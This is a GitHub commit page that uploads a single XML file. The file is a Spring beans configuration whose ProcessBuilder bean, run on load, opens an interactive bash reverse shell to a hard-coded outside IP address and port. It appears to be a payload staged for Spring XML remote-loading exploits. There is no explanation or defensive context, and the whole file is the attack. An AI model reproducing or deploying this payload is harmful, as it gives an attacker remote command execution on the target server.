Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
  • Loading branch information
sam9411 committed Apr 24, 2024
1 parent d027238 commit b4351ce
Showing 1 changed file with 15 additions and 0 deletions.
15 changes: 15 additions & 0 deletions 4677326563.xml
Original file line number Diff line number Diff line change
@@ -0,0 +1,15 @@
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value>bash -i &#x3E;&#x26; /dev/tcp/206.189.80.59/22042 0&#x3E;&#x26;1</value>
</list>
</constructor-arg>
</bean>
</beans>

0 comments on commit b4351ce

Please sign in to comment.